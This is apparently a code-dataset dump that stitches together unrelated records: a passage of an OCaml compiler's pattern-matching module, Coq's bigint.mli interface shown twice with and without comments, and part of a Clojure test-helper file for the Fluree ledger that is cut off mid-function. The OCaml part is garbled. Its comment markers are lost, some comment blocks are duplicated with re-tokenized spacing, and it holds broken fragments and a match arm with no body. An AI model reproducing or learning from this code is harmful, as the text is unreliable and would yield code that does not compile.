      List.exists (fun lam -> approx_present v lam) args
  | Llet (Alias, _k, _, l1, l2) ->
      approx_present v l1 || approx_present v l2
  | Lvar vv -> Ident.same v vv
  | _ -> true
(* Push the binding [let v = arg] down into [lam], past tests that do
   not mention [v], so [arg] is evaluated only where needed. *)
let rec lower_bind v arg lam = match lam with
  | Lifthenelse (cond, ifso, ifnot) ->
      let pcond = approx_present v cond
      and pso = approx_present v ifso
      and pnot = approx_present v ifnot in
      begin match pcond, pso, pnot with
        | false, false, false -> lam
        | false, true, false ->
            Lifthenelse (cond, lower_bind v arg ifso, ifnot)
        | false, false, true ->
            Lifthenelse (cond, ifso, lower_bind v arg ifnot)
        | _,_,_ -> bind Alias v arg lam
      end
  | Lswitch (ls,({sw_consts=[i,act] ; sw_blocks = []} as sw), loc)
    when not (approx_present v ls) ->
      Lswitch (ls, {sw with sw_consts = [i,lower_bind v arg act]}, loc)
  | Lswitch (ls,({sw_consts=[] ; sw_blocks = [i,act]} as sw), loc)
    when not (approx_present v ls) ->
      Lswitch (ls, {sw with sw_blocks = [i,lower_bind v arg act]}, loc)
  | Llet (Alias, k, vv, lv, l) ->
      if approx_present v lv then
        bind Alias v arg lam
      else
        Llet (Alias, k, vv, lv, lower_bind v arg l)
  (* NOTE(review): the body of the following arm appears to be missing
     (as written this does not parse) — confirm the intended expression
     against the project's history before building. *)
  | Lvar u when Ident.same u v && Ident.name u = "*sth*" ->
  | _ ->
      bind Alias v arg lam
(* Bind [v] to [arg], using [lower_bind] for alias bindings of
   non-variable arguments. *)
let bind_check str v arg lam = match str,arg with
  | _, Lvar _ ->bind str v arg lam
  | Alias,_ -> lower_bind v arg lam
  | _,_ -> bind str v arg lam

(* Matrix with no rows left: jump to the innermost default handler. *)
let comp_exit ctx m = match m.default with
  | (_,i)::_ -> Lstaticraise (i,[]), jumps_singleton i ctx
  | _ -> fatal_error "Matching.comp_exit"
(* Compile the first matrix, then each follow-up matrix in turn, wiring
   them through static catches; handler [i] is compiled in the context
   extracted from the jumps of what precedes it. *)
let rec comp_match_handlers comp_fun partial ctx arg first_match next_matchs =
  match next_matchs with
  | [] -> comp_fun partial ctx arg first_match
  | rem ->
      let rec c_rec body total_body = function
        | [] -> body, total_body
        | (i,pm)::rem ->
            let ctx_i,total_rem = jumps_extract i total_body in
            begin match ctx_i with
              | [] -> c_rec body total_body rem
              | _ ->
                  try
                    let li,total_i =
                      comp_fun
                        (match rem with [] -> partial | _ -> Partial)
                        ctx_i arg pm in
                    c_rec
                      (Lstaticcatch (body,(i,[]),li))
                      (jumps_union total_i total_rem)
                      rem
                  with
                  | Unused ->
                      c_rec (Lstaticcatch (body,(i,[]),lambda_unit))
                        total_rem rem
            end in
      try
        let first_lam,total = comp_fun Partial ctx arg first_match in
        c_rec first_lam total rem
      with Unused -> match next_matchs with
        | [] -> raise Unused
        | (_,x)::xs -> comp_match_handlers comp_fun partial ctx arg x xs
(* Reuse a user variable name from the patterns for the matched value,
   falling back to a fresh ident named [default]. *)
let rec name_pattern default = function
    (pat :: _, _) :: rem ->
      begin match Typecore.id_of_pattern pat with
        | Some id -> id
        | None -> name_pattern default rem
      end
  | _ -> Ident.create default

(* Ensure the scrutinee is a variable, naming it after the patterns. *)
let arg_to_var arg cls = match arg with
  | Lvar v -> v,arg
  | _ ->
      let v = name_pattern "match" cls in
      v,Lvar v

(* Hook letting the front-end supply constructor names for switches. *)
let names_from_construct_pattern : (pattern -> switch_names option) ref =
  ref (fun _ -> None)
(*
  The main compilation function.
     Input:
        repr = used for inserting debug events
        partial = exhaustiveness information from Parmatch
        ctx = a context
        m = a pattern matching

     Output: a lambda term, a jump summary {..., exit number -> context, .. }
*)
(* Compile pattern matching [m] in context [ctx]; returns a lambda term
   and a jump summary mapping exit numbers to contexts. *)
let rec compile_match repr partial ctx m = match m with
  | { cases = []; args = [] } -> comp_exit ctx m
  | { cases = ([], action) :: rem } ->
      if is_guarded action then begin
        let (lambda, total) =
          compile_match None partial ctx { m with cases = rem } in
        event_branch repr (patch_guarded lambda action), total
      end else
        (event_branch repr action, jumps_empty)
  | { args = (arg, str)::argl } ->
      let v,newarg = arg_to_var arg m.cases in
      let first_match,rem =
        split_precompile (Some v)
          { m with args = (newarg, Alias) :: argl } in
      let (lam, total) =
        comp_match_handlers
          ((if dbg then do_compile_matching_pr else do_compile_matching) repr)
          partial ctx newarg first_match rem in
      bind_check str v arg lam, total
  | _ -> assert false

(* Tracing wrapper around do_compile_matching (dbg mode only). *)
and do_compile_matching_pr repr partial ctx arg x =
  prerr_string "COMPILE: " ;
  prerr_endline (match partial with Partial -> "Partial" | Total -> "Total") ;
  prerr_endline "MATCH" ;
  pretty_precompiled x ;
  prerr_endline "CTX" ;
  pretty_ctx ctx ;
  let (_, jumps) as r = do_compile_matching repr partial ctx arg x in
  prerr_endline "JUMPS" ;
  pretty_jumps jumps ;
  r

(* Dispatch on the head pattern of the matrix. *)
and do_compile_matching repr partial ctx arg pmh = match pmh with
  | Pm pm ->
      let pat = what_is_cases pm.cases in
      begin match pat.pat_desc with
        | Tpat_any ->
            compile_no_test
              divide_var ctx_rshift repr partial ctx pm
        | Tpat_tuple patl ->
            compile_no_test
              (divide_tuple (List.length patl) (normalize_pat pat)) ctx_combine
              repr partial ctx pm
        | Tpat_record ((_, lbl,_)::_,_) ->
            compile_no_test
              (divide_record lbl.lbl_all (normalize_pat pat))
              ctx_combine repr partial ctx pm
        | Tpat_constant cst ->
            let names = None in
            compile_test
              (compile_match repr partial) partial
              divide_constant
              (combine_constant names pat.pat_loc arg cst partial)
              ctx pm
        | Tpat_construct (_, cstr, _) ->
            let sw_names = !names_from_construct_pattern pat in
            compile_test
              (compile_match repr partial) partial
              divide_constructor
              (combine_constructor sw_names pat.pat_loc arg pat cstr partial)
              ctx pm
        | Tpat_array _ ->
            let names = None in
            compile_test (compile_match repr partial) partial
              divide_array (combine_array names pat.pat_loc arg partial)
              ctx pm
        | Tpat_lazy _ ->
            compile_no_test
              (divide_lazy (normalize_pat pat))
              ctx_combine repr partial ctx pm
        | Tpat_variant(_, _, row) ->
            let names = None in
            compile_test (compile_match repr partial) partial
              (divide_variant !row)
              (combine_variant names pat.pat_loc !row arg partial)
              ctx pm
        | _ -> assert false
      end
  | PmVar {inside=pmh ; var_arg=arg} ->
      let lam, total =
        do_compile_matching repr partial (ctx_lshift ctx) arg pmh in
      lam, jumps_map ctx_rshift total
  | PmOr {body=body ; handlers=handlers} ->
      let lam, total = compile_match repr partial ctx body in
      compile_orhandlers (compile_match repr partial) lam total ctx handlers

(* No test needed: specialize the matrix and recurse. *)
and compile_no_test divide up_ctx repr partial ctx to_match =
  let {pm=this_match ; ctx=this_ctx } = divide ctx to_match in
  let lambda,total = compile_match repr partial this_ctx this_match in
  lambda, jumps_map up_ctx total
(*
  If there is a guard in a matching or a lazy pattern,
  then set exhaustiveness info to Partial.
  (because of side effects, assume the worst).

  Notice that exhaustiveness information is trusted by the compiler,
  that is, a match flagged as Total should not fail at runtime.
  More specifically, for instance if match y with x::_ -> x is flagged
  total (as it happens during JoCaml compilation) then y cannot be []
  at runtime. As a consequence, the static Total exhaustiveness information
  have to be downgraded to Partial, in the dubious cases where guards
  or lazy pattern execute arbitrary code that may perform side effects
  and change the subject values.
  LM:
  Lazy pattern was PR#5992, initial patch by lpw25.
  I have generalized the patch, so as to also find mutable fields.
*)
(* Does [pred] hold for some sub-pattern of the given pattern? *)
let find_in_pat pred =
  let rec find_rec p =
    pred p.pat_desc ||
    begin match p.pat_desc with
      | Tpat_alias (p,_,_) | Tpat_variant (_,Some p,_) | Tpat_lazy p ->
          find_rec p
      | Tpat_tuple ps|Tpat_construct (_,_,ps) | Tpat_array ps ->
          List.exists find_rec ps
      | Tpat_record (lpats,_) ->
          List.exists
            (fun (_, _, p) -> find_rec p)
            lpats
      | Tpat_or (p,q,_) ->
          find_rec p || find_rec q
      | Tpat_constant _ | Tpat_var _
      | Tpat_any | Tpat_variant (_,None,_) -> false
    end in
  find_rec

(* Top-level lazy pattern test. *)
let is_lazy_pat = function
  | Tpat_lazy _ -> true
  | Tpat_alias _ | Tpat_variant _ | Tpat_record _
  | Tpat_tuple _|Tpat_construct _ | Tpat_array _
  | Tpat_or _ | Tpat_constant _ | Tpat_var _ | Tpat_any
    -> false

(* Does the pattern contain a lazy sub-pattern? *)
let is_lazy p = find_in_pat is_lazy_pat p

(* Top-level record pattern matching at least one mutable field. *)
let have_mutable_field p = match p with
  | Tpat_record (lps,_) ->
      List.exists
        (fun (_,lbl,_) ->
           match lbl.Types.lbl_mut with
           | Mutable -> true
           | Immutable -> false)
        lps
  | Tpat_alias _ | Tpat_variant _ | Tpat_lazy _
  | Tpat_tuple _|Tpat_construct _ | Tpat_array _
  | Tpat_or _
  | Tpat_constant _ | Tpat_var _ | Tpat_any
    -> false

(* Does the pattern read a mutable field somewhere? *)
let is_mutable p = find_in_pat have_mutable_field p
(* Downgrade Total to Partial when a guard or lazy pattern may run
   arbitrary code while mutable state is being matched. *)
let check_partial is_mutable is_lazy pat_act_list = function
  | Partial -> Partial
  | Total ->
      if
        List.exists
          (fun (pats, lam) ->
             is_mutable pats && (is_guarded lam || is_lazy pats))
          pat_act_list
      then Partial
      else Total

(* Specializations for multi-pattern rows and single patterns
   (the second shadows the generic version above). *)
let check_partial_list =
  check_partial (List.exists is_mutable) (List.exists is_lazy)
let check_partial = check_partial is_mutable is_lazy
(* Initial context: [n] wildcard columns. *)
let start_ctx n = [{left=[] ; right = omegas n}]

(* Wrap [lambda] in a catch for the failure exit [i], unless no jump to
   it remains in the summary. *)
let check_total total lambda i handler_fun =
  if jumps_is_empty total then
    lambda
  else begin
    Lstaticcatch(lambda, (i,[]), handler_fun())
  end
(* Entry point: compile [pat_act_list] against [arg].  For partial
   matches a failure exit running [handler_fun ()] is installed.
   Fix: the handler of the try block had been lost with its trailing
   comment, leaving `with`/`end` empty; `| Unused -> assert false` is
   restored (the whole match cannot be unused). *)
let compile_matching repr handler_fun arg pat_act_list partial =
  let partial = check_partial pat_act_list partial in
  match partial with
  | Partial ->
      let raise_num = next_raise_count () in
      let pm =
        { cases = List.map (fun (pat, act) -> ([pat], act)) pat_act_list;
          args = [arg, Strict] ;
          default = [[[omega]],raise_num]} in
      begin try
        let (lambda, total) = compile_match repr partial (start_ctx 1) pm in
        check_total total lambda raise_num handler_fun
      with
      | Unused -> assert false (* ; handler_fun() *)
      end
  | Total ->
      let pm =
        { cases = List.map (fun (pat, act) -> ([pat], act)) pat_act_list;
          args = [arg, Strict] ;
          default = []} in
      let (lambda, total) = compile_match repr partial (start_ctx 1) pm in
      assert (jumps_is_empty total) ;
      lambda
let partial_function loc () =
let (fname, line, char) = Location.get_pos_info loc.Location.loc_start in
let fname =
Filename.basename fname
in
Lprim(Praise Raise_regular, [Lprim(Pmakeblock(Blk_extension),
[transl_normal_path Predef.path_match_failure;
Lconst(Const_block(Blk_tuple,
[Const_base(Const_string (fname, None));
Const_base(Const_int line);
Const_base(Const_int char)]))], loc)], loc)
let for_function loc repr param pat_act_list partial =
compile_matching repr (partial_function loc) param pat_act_list partial
In the following two cases , exhaustiveness info is not available !
let for_trywith param pat_act_list =
compile_matching None
(fun () -> Lprim(Praise Raise_reraise, [param], Location.none))
param pat_act_list Partial
let simple_for_let loc param pat body =
compile_matching None (partial_function loc) param [pat, body] Partial
Optimize binding of immediate tuples
The goal of the implementation of ' for_let ' below , which replaces
' simple_for_let ' , is to avoid tuple allocation in cases such as
this one :
let ( x , y ) =
let foo = ... in
if foo then ( 1 , 2 ) else ( 3,4 )
in bar
The compiler easily optimizes the simple ` let ( x , y ) = ( 1,2 ) in ... `
case ( call to Matching.for_multiple_match from Translcore ) , but
did n't optimize situations where the rhs tuples are hidden under
a more complex context .
The idea comes from who suggested and implemented
the following compilation method , based on :
let x = dummy in let y = dummy in
begin
let foo = ... in
if foo then
( let x1 = 1 in let y1 = 2 in x < - x1 ; y < - y1 )
else
( let x2 = 3 in let y2 = 4 in x < - x2 ; y < - y2 )
end ;
bar
The current implementation from uses Lstaticcatch /
Lstaticraise instead :
catch
let foo = ... in
if foo then
( let x1 = 1 in let y1 = 2 in exit x1 y1 )
else
( let x2 = 3 in let y2 = 4 in exit x2 y2 )
with x y - >
bar
The catch / exit is used to avoid duplication of the let body ( ' bar '
in the example ) , on ' if ' branches for example ; it is useless for
linear contexts such as ' let ' , but we do n't need to be careful to
generate nice code because Simplif will remove such useless
catch / exit .
The goal of the implementation of 'for_let' below, which replaces
'simple_for_let', is to avoid tuple allocation in cases such as
this one:
let (x,y) =
let foo = ... in
if foo then (1, 2) else (3,4)
in bar
The compiler easily optimizes the simple `let (x,y) = (1,2) in ...`
case (call to Matching.for_multiple_match from Translcore), but
didn't optimize situations where the rhs tuples are hidden under
a more complex context.
The idea comes from Alain Frisch who suggested and implemented
the following compilation method, based on Lassign:
let x = dummy in let y = dummy in
begin
let foo = ... in
if foo then
(let x1 = 1 in let y1 = 2 in x <- x1; y <- y1)
else
(let x2 = 3 in let y2 = 4 in x <- x2; y <- y2)
end;
bar
The current implementation from Gabriel Scherer uses Lstaticcatch /
Lstaticraise instead:
catch
let foo = ... in
if foo then
(let x1 = 1 in let y1 = 2 in exit x1 y1)
else
(let x2 = 3 in let y2 = 4 in exit x2 y2)
with x y ->
bar
The catch/exit is used to avoid duplication of the let body ('bar'
in the example), on 'if' branches for example; it is useless for
linear contexts such as 'let', but we don't need to be careful to
generate nice code because Simplif will remove such useless
catch/exit.
*)
let rec map_return f = function
| Llet (str, k, id, l1, l2) -> Llet (str, k, id, l1, map_return f l2)
| Lletrec (l1, l2) -> Lletrec (l1, map_return f l2)
| Lifthenelse (lcond, lthen, lelse) ->
Lifthenelse (lcond, map_return f lthen, map_return f lelse)
| Lsequence (l1, l2) -> Lsequence (l1, map_return f l2)
| Ltrywith (l1, id, l2) -> Ltrywith (map_return f l1, id, map_return f l2)
| Lstaticcatch (l1, b, l2) ->
Lstaticcatch (map_return f l1, b, map_return f l2)
| Lstaticraise _ | Lprim(Praise _, _, _) as l -> l
| l -> f l
The ' opt ' reference indicates if the optimization is worthy .
It is shared by the different calls to ' assign_pat ' performed from
' map_return ' . For example with the code
let ( x , y ) = if foo then z else ( 1,2 )
the else - branch will activate the optimization for both branches .
That means that the optimization is activated if * there exists * an
interesting tuple in one hole of the let - rhs context . We could
choose to activate it only if * all * holes are interesting . We made
that choice because being optimistic is extremely cheap ( one static
exit / catch overhead in the " wrong cases " ) , while being pessimistic
can be costly ( one unnecessary tuple allocation ) .
It is shared by the different calls to 'assign_pat' performed from
'map_return'. For example with the code
let (x, y) = if foo then z else (1,2)
the else-branch will activate the optimization for both branches.
That means that the optimization is activated if *there exists* an
interesting tuple in one hole of the let-rhs context. We could
choose to activate it only if *all* holes are interesting. We made
that choice because being optimistic is extremely cheap (one static
exit/catch overhead in the "wrong cases"), while being pessimistic
can be costly (one unnecessary tuple allocation).
*)
let assign_pat opt nraise catch_ids loc pat lam =
let rec collect acc pat lam = match pat.pat_desc, lam with
| Tpat_tuple patl, Lprim(Pmakeblock _, lams, _) ->
opt := true;
List.fold_left2 collect acc patl lams
| Tpat_tuple patl, Lconst(Const_block( _, scl)) ->
opt := true;
let collect_const acc pat sc = collect acc pat (Lconst sc) in
List.fold_left2 collect_const acc patl scl
| _ ->
pattern idents will be bound in ( let body ) , so we
refresh them here to guarantee binders uniqueness
refresh them here to guarantee binders uniqueness *)
let pat_ids = pat_bound_idents pat in
let fresh_ids = List.map (fun id -> id, Ident.rename id) pat_ids in
(fresh_ids, alpha_pat fresh_ids pat, lam) :: acc
in
let rev_sublets = List.rev (collect [] pat lam) in
let exit =
build an Ident.tbl to avoid quadratic refreshing costs
let add t (id, fresh_id) = Ident.add id fresh_id t in
let add_ids acc (ids, _pat, _lam) = List.fold_left add acc ids in
let tbl = List.fold_left add_ids Ident.empty rev_sublets in
let fresh_var id = Lvar (Ident.find_same id tbl) in
Lstaticraise(nraise, List.map fresh_var catch_ids)
in
let push_sublet code (_ids, pat, lam) = simple_for_let loc lam pat code in
List.fold_left push_sublet exit rev_sublets
let for_let loc param pat body =
match pat.pat_desc with
| Tpat_any ->
This eliminates a useless variable ( and stack slot in bytecode )
for " let _ = ... " . See # 6865 .
for "let _ = ...". See #6865. *)
Lsequence(param, body)
| Tpat_var (id, _) ->
Llet(Strict, Pgenval, id, param, body)
| _ ->
if !Config.bs_only then simple_for_let loc param pat body
else
let opt = ref false in
let nraise = next_raise_count () in
let catch_ids = pat_bound_idents pat in
let bind = map_return (assign_pat opt nraise catch_ids loc pat) param in
if !opt then Lstaticcatch(bind, (nraise, catch_ids), body)
else simple_for_let loc param pat body
let for_tupled_function loc paraml pats_act_list partial =
let partial = check_partial_list pats_act_list partial in
let raise_num = next_raise_count () in
let omegas = [List.map (fun _ -> omega) paraml] in
let pm =
{ cases = pats_act_list;
args = List.map (fun id -> (Lvar id, Strict)) paraml ;
default = [omegas,raise_num]
} in
try
let (lambda, total) = compile_match None partial
(start_ctx (List.length paraml)) pm in
check_total total lambda raise_num (partial_function loc)
with
| Unused -> partial_function loc ()
let flatten_pattern size p = match p.pat_desc with
| Tpat_tuple args -> args
| Tpat_any -> omegas size
| _ -> raise Cannot_flatten
let rec flatten_pat_line size p k = match p.pat_desc with
| Tpat_any -> omegas size::k
| Tpat_tuple args -> args::k
| Tpat_or (p1,p2,_) -> flatten_pat_line size p1 (flatten_pat_line size p2 k)
Note : if this ' as ' pat is here , then this is a
useless binding , solves
useless binding, solves PR#3780 *)
flatten_pat_line size p k
| _ -> fatal_error "Matching.flatten_pat_line"
let flatten_cases size cases =
List.map
(fun (ps,action) -> match ps with
| [p] -> flatten_pattern size p,action
| _ -> fatal_error "Matching.flatten_case")
cases
let flatten_matrix size pss =
List.fold_right
(fun ps r -> match ps with
| [p] -> flatten_pat_line size p r
| _ -> fatal_error "Matching.flatten_matrix")
pss []
let flatten_def size def =
List.map
(fun (pss,i) -> flatten_matrix size pss,i)
def
let flatten_pm size args pm =
{args = args ; cases = flatten_cases size pm.cases ;
default = flatten_def size pm.default}
let flatten_precompiled size args pmh = match pmh with
| Pm pm -> Pm (flatten_pm size args pm)
| PmOr {body=b ; handlers=hs ; or_matrix=m} ->
PmOr
{body=flatten_pm size args b ;
handlers=
List.map
(fun (mat,i,vars,pm) -> flatten_matrix size mat,i,vars,pm)
hs ;
or_matrix=flatten_matrix size m ;}
| PmVar _ -> assert false
is a ` ` comp_fun '' argument to comp_match_handlers .
Hence it needs a fourth argument , which it ignores
compiled_flattened is a ``comp_fun'' argument to comp_match_handlers.
Hence it needs a fourth argument, which it ignores
*)
let compile_flattened repr partial ctx _ pmh = match pmh with
| Pm pm -> compile_match repr partial ctx pm
| PmOr {body=b ; handlers=hs} ->
let lam, total = compile_match repr partial ctx b in
compile_orhandlers (compile_match repr partial) lam total ctx hs
| PmVar _ -> assert false
let do_for_multiple_match loc paraml pat_act_list partial =
let repr = None in
let partial = check_partial pat_act_list partial in
let raise_num,pm1 =
match partial with
| Partial ->
let raise_num = next_raise_count () in
raise_num,
{ cases = List.map (fun (pat, act) -> ([pat], act)) pat_act_list;
args = [Lprim(Pmakeblock( Blk_tuple), paraml, loc), Strict];
default = [[[omega]],raise_num] }
| _ ->
-1,
{ cases = List.map (fun (pat, act) -> ([pat], act)) pat_act_list;
args = [Lprim(Pmakeblock( Blk_tuple), paraml, loc), Strict];
default = [] } in
try
try
let next, nexts = split_precompile None pm1 in
let size = List.length paraml
and idl = List.map (fun _ -> Ident.create "match") paraml in
let args = List.map (fun id -> Lvar id, Alias) idl in
let flat_next = flatten_precompiled size args next
and flat_nexts =
List.map
(fun (e,pm) -> e,flatten_precompiled size args pm)
nexts in
let lam, total =
comp_match_handlers
(compile_flattened repr)
partial (start_ctx size) () flat_next flat_nexts in
List.fold_right2 (bind Strict) idl paraml
(match partial with
| Partial ->
check_total total lam raise_num (partial_function loc)
| Total ->
assert (jumps_is_empty total) ;
lam)
with Cannot_flatten ->
let (lambda, total) = compile_match None partial (start_ctx 1) pm1 in
begin match partial with
| Partial ->
check_total total lambda raise_num (partial_function loc)
| Total ->
assert (jumps_is_empty total) ;
lambda
end
with Unused ->
; ( )
let param_to_var param = match param with
| Lvar v -> v,None
| _ -> Ident.create "match",Some param
let bind_opt (v,eo) k = match eo with
| None -> k
| Some e -> Lambda.bind Strict v e k
let for_multiple_match loc paraml pat_act_list partial =
let v_paraml = List.map param_to_var paraml in
let paraml = List.map (fun (v,_) -> Lvar v) v_paraml in
List.fold_right bind_opt v_paraml
(do_for_multiple_match loc paraml pat_act_list partial)
|
540183582ffb3145dafe5b58e3df9ad3af0f7e39ecd8ee3638d5d32cfdf4fa73 | fetburner/Coq2SML | bigint.mli | (************************************************************************)
v * The Coq Proof Assistant / The Coq Development Team
< O _ _ _ , , * INRIA - CNRS - LIX - LRI - PPS - Copyright 1999 - 2014
\VV/ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
(* // * This file is distributed under the terms of the *)
(* * GNU Lesser General Public License Version 2.1 *)
(************************************************************************)
(** Arbitrary large integer numbers *)
type bigint
val of_string : string -> bigint
val to_string : bigint -> string
val of_int : int -> bigint
* May raise a Failure on oversized numbers
val zero : bigint
val one : bigint
val two : bigint
val div2_with_rest : bigint -> bigint * bool (** true=odd; false=even *)
val add_1 : bigint -> bigint
val sub_1 : bigint -> bigint
val mult_2 : bigint -> bigint
val add : bigint -> bigint -> bigint
val sub : bigint -> bigint -> bigint
val mult : bigint -> bigint -> bigint
val euclid : bigint -> bigint -> bigint * bigint
val less_than : bigint -> bigint -> bool
val equal : bigint -> bigint -> bool
val is_strictly_pos : bigint -> bool
val is_strictly_neg : bigint -> bool
val is_pos_or_zero : bigint -> bool
val is_neg_or_zero : bigint -> bool
val neg : bigint -> bigint
val pow : bigint -> int -> bigint
| null | https://raw.githubusercontent.com/fetburner/Coq2SML/322d613619edbb62edafa999bff24b1993f37612/coq-8.4pl4/lib/bigint.mli | ocaml | **********************************************************************
// * This file is distributed under the terms of the
* GNU Lesser General Public License Version 2.1
**********************************************************************
* Arbitrary large integer numbers
* true=odd; false=even | v * The Coq Proof Assistant / The Coq Development Team
< O _ _ _ , , * INRIA - CNRS - LIX - LRI - PPS - Copyright 1999 - 2014
\VV/ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
type bigint
val of_string : string -> bigint
val to_string : bigint -> string
val of_int : int -> bigint
* May raise a Failure on oversized numbers
val zero : bigint
val one : bigint
val two : bigint
val add_1 : bigint -> bigint
val sub_1 : bigint -> bigint
val mult_2 : bigint -> bigint
val add : bigint -> bigint -> bigint
val sub : bigint -> bigint -> bigint
val mult : bigint -> bigint -> bigint
val euclid : bigint -> bigint -> bigint * bigint
val less_than : bigint -> bigint -> bool
val equal : bigint -> bigint -> bool
val is_strictly_pos : bigint -> bool
val is_strictly_neg : bigint -> bool
val is_pos_or_zero : bigint -> bool
val is_neg_or_zero : bigint -> bool
val neg : bigint -> bigint
val pow : bigint -> int -> bigint
|
57f9b90206f747a03531b32e6b1eaffd587e8567dfb0de767bc2a611fc29f720 | fluree/ledger | test_helpers.clj | (ns fluree.db.test-helpers
(:require [clojure.test :refer :all]
[clojure.core.async :as async :refer [<!!]]
[fluree.db.server :as server]
[fluree.db.api :as fdb]
[fluree.db.server-settings :as setting]
[fluree.db.util.log :as log]
[clojure.java.io :as io]
[clojure.edn :as edn]
[fluree.db.util.json :as json]
[org.httpkit.client :as http]
[fluree.db.api.auth :as fdb-auth]
[fluree.db.ledger.txgroup.txgroup-proto :as txproto]
[clojure.string :as str])
(:import (java.net ServerSocket)
(java.util UUID)
(java.io File)))
(def ^:constant init-timeout-ms 120000)
(defn get-free-port []
(let [socket (ServerSocket. 0)]
(.close socket)
(.getLocalPort socket)))
(def port (delay (get-free-port)))
(def alt-port (delay (get-free-port)))
(def config (delay (setting/build-env
{:fdb-mode "dev"
:fdb-group-servers "DEF@localhost:11001"
:fdb-group-this-server "DEF"
:fdb-storage-type "memory"
:fdb-api-port @port
:fdb-consensus-type "in-memory"})))
(def system nil)
(def ledger-endpoints "fluree/api")
(def ledger-query+transact "fluree/querytransact")
(def ledger-chat "fluree/chat")
(def ledger-crypto "fluree/crypto")
(def ledger-voting "fluree/voting")
(def ledger-supplychain "fluree/supplychain")
(def ledger-todo "fluree/todo")
(def ledger-invoice "fluree/invoice")
(def ledger-mutable "fluree/mutable")
(def all-ledgers
#{ledger-endpoints ledger-query+transact ledger-chat ledger-crypto
ledger-voting ledger-supplychain ledger-todo ledger-invoice})
(defn print-banner [msg]
(println "\n*************************************\n\n"
msg
"\n\n*************************************"))
(defn start*
[& [opts]]
(alter-var-root #'system (constantly (server/startup (merge @config opts)))))
(defn start
[& [opts]]
(print-banner "STARTING")
(start* opts)
:started)
(defn stop* []
(alter-var-root #'system (fn [s] (when s (server/shutdown s)))))
(defn stop []
(print-banner "STOPPING")
(stop*)
:stopped)
(defn check-if-ready
"Kicks off simultaneous asynchronous ledger-ready? checks for every ledger in
ledgers. Returns a core.async channel that will be filled with vectors like
[ledger ready?] as they become available and then closed when all have been
returned."
[conn ledgers]
(let [res-ch (async/chan (count ledgers))
puts (atom 0)]
(dorun
(for [ledger ledgers]
(async/take! (fdb/ledger-ready?-async conn ledger)
#(async/put! res-ch [ledger %]
(fn [_]
(swap! puts inc)
(when (= @puts (count ledgers))
(async/close! res-ch)))))))
res-ch))
(defn wait-for-init
([conn ledgers] (wait-for-init conn ledgers init-timeout-ms))
([conn ledgers timeout]
(loop [sleep 0
elapsed 0
ledgers ledgers]
(let [start (System/currentTimeMillis)]
(Thread/sleep sleep)
(let [ready-checks (check-if-ready conn ledgers)
ready-ledgers (<!! (async/reduce
(fn [rls [ledger ready?]]
(assoc rls ledger ready?))
{} ready-checks))]
(when (not-every? second ready-ledgers)
(let [split (- (System/currentTimeMillis) start)
elapsed (+ elapsed split)]
(if (>= elapsed timeout)
(throw (RuntimeException.
(str "Waited " elapsed
"ms for test ledgers to initialize. Max is "
timeout "ms.")))
(let [poky-ledgers (remove second ready-ledgers)]
; seeing some intermittent failures to initialize sometimes
; so this starts outputting some diagnostic messages once
we 've used up 80 % of the timeout ; if we figure out what 's
; wrong, can remove the (when ...) form below and the (do ...)
; wrapper
(when (<= 80 (* 100 (/ elapsed timeout)))
(println "Running out of time for ledgers to init"
(str "(~" (- timeout elapsed) "ms remaining).")
"Waiting on" (count poky-ledgers)
"ledger(s) to initialize:"
(pr-str (map first poky-ledgers))))
(recur 1000 elapsed
(map first (remove second ready-ledgers))))))))))))
(defn init-ledgers!
"Creates ledgers and waits for them to be ready.
0-arity version creates fluree.db.test-helpers/all-ledgers.
1-and-2-arity versions take a collection of ledger names or maps that look
like: {:name \"ledger-name\", :opts opts-map-to-new-ledger}.
2-arity version takes an alternate system as the first arg (defaults to
fluree.db.test-helpers/system)."
([] (init-ledgers! system all-ledgers))
([ledgers] (init-ledgers! system ledgers))
([{:keys [conn] :as _system} ledgers]
(let [ledgers-with-opts (map #(if (map? %) % {:name %}) ledgers)
results (doall
(for [{ledger :name, opts :opts} ledgers-with-opts]
(fdb/new-ledger-async conn ledger opts)))]
;; check for any immediate errors (like invalid names) in create requests
(when-let [result (some #(when (instance? Exception %) %)
(map async/poll! results))]
(throw (ex-info (str "Error creating at least one test ledger: "
(ex-message result))
{:cause result})))
(wait-for-init conn (map :name ledgers-with-opts)))))
(defn standard-request
([body]
(standard-request body {}))
([body opts]
{:headers (cond-> {"content-type" "application/json"}
(:token opts) (assoc "Authorization" (str "Bearer " (:token opts))))
:body (json/stringify body)}))
(def endpoint-url-short (str ":" @port "/fdb/"))
(defn safe-update
"Like update but takes a predicate fn p that is first run on the current
value for key k in map m. Iff p returns truthy does the update take place."
[m k p f]
(let [v (get m k)]
(if (p v)
(update m k f)
m)))
(defn transact-resource
"Transacts the type (keyword form of test-resources subdirectory) of resource
with filename file. Optional api arg can be either :http (default) or :clj to
indicate which API to use for the transaction. :clj can be useful under
closed-api mode since this doesn't sign the HTTP requests."
([type ledger file] (transact-resource type ledger file :http))
([type ledger file api]
(let [filename (if (str/ends-with? file ".edn") file (str file ".edn"))
tx (->> filename (str (name type) "/") io/resource slurp edn/read-string)]
(case api
:clj
@(fdb/transact (:conn system) ledger tx)
:http
(let [endpoint (str endpoint-url-short ledger "/transact")]
(-> tx
standard-request
(->> (http/post endpoint))
deref
(safe-update :body string? json/parse)))))))
(def ^{:arglists '([ledger file] [ledger file api])
:doc "Like transact-resource but bakes in :schemas as the first arg."}
transact-schema
(partial transact-resource :schemas))
(def ^{:arglists '([ledger file] [ledger file api])
:doc "Like transact-resource but bakes in :data as the first arg."}
transact-data
(partial transact-resource :data))
(defn load-keys
[name]
(some-> name (str ".edn") (->> (str "keys/")) (->> io/resource) slurp
edn/read-string))
(defn rand-ledger
"Generate a random, new, empty ledger with base-name prefix. Waits for it to
be ready and then returns its name as a string.
Also takes an optional second map arg with the keys:
- :opts that will be passed to fluree.db.api/new-ledger-async
- :http/schema schema resource filenames that will be transacted with the HTTP API
- :clj/schema schema resource filenames that will be transacted with the CLJ API
- :http/data data resource filenames that will be transacted with the HTTP API
- :clj/data data resource filenames that will be transacted with the CLJ API"
([base-name] (rand-ledger base-name {}))
([base-name params]
(let [base-name* (if (str/includes? base-name "/")
base-name
(str "test/" base-name))
name (str base-name* "-" (UUID/randomUUID))]
(init-ledgers! [{:name name, :opts (:opts params)}])
(doseq [s (:clj/schema params)]
(transact-schema name s :clj))
(doseq [s (:http/schema params)]
